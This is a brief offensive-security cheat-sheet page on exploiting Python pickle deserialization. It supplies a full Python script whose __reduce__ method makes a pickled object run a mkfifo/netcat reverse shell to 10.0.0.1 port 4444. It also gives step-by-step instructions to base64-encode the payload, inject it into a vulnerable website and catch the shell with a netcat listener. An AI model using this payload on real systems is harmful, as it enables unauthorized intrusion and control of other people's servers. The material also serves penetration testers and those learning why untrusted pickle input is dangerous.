Python Pickle RCE
Last modified: 2023-08-10
The python “pickle” module, that serializes and deserializes a Python object, is vulnerable to remote code execution. If the website uses this module, we may be able to execute arbitrary code.
Exploitation
Below is the Python script (mypickle.py
) to generate the payload to reverse shell.
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f')
return os.system, (cmd,)
if __name__ == '__main__':
pickled = pickle.dumps(RCE())
print(base64.b64encode(pickled))
# or
print(base64.urlsafe_b64encode(pickled))
Now run this script to generate the Base64 payload.
python3 mypickle.py
Copy the ourput base64 string and paste it to where the payload affects in website.
Before reloading the web page, start a listener in local machine.
nc -lvnp 4444
Then reload the page. We should get a shell in local terminal.